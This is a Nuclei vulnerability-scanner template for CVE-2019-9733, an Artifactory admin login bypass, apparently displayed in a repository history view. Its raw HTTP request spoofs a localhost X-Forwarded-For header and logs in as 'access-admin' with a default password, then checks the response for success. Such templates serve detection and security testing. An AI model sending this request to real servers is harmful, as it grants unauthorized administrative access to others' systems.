nuclei-templates/cves/2019/CVE-2019-9733.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2020-10-01 06:40:15 +00:00
id: cve-2019-9733
info:
name: Artifactory Access-Admin Login Bypass
author: akshansh
2020-10-01 21:19:18 +00:00
severity: critical
2020-10-01 06:40:15 +00:00
requests:
- raw:
- |
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Content-Length: 60
Accept: application/json, text/plain, */*
X-Requested-With: artUI
serial: 58
2020-10-01 21:19:18 +00:00
X-Forwarded-For: 127.0.0.1
2020-10-01 06:40:15 +00:00
Request-Agent: artifactoryUI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Type: application/json
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/artifactory/webapp/
Accept-Language: en-US,en;q=0.9
Connection: close
{"user":"access-admin","password":"password","type":"login"}
2020-10-01 07:08:30 +00:00
2020-10-01 06:40:15 +00:00
matchers-condition: and
matchers:
- type: word
words:
2020-10-01 21:19:18 +00:00
- '"username": "access-admin"'
2020-10-01 06:40:15 +00:00
part: body
2020-10-01 21:19:18 +00:00
2020-10-01 06:40:15 +00:00
- type: status
status:
2020-10-01 21:19:18 +00:00
- 200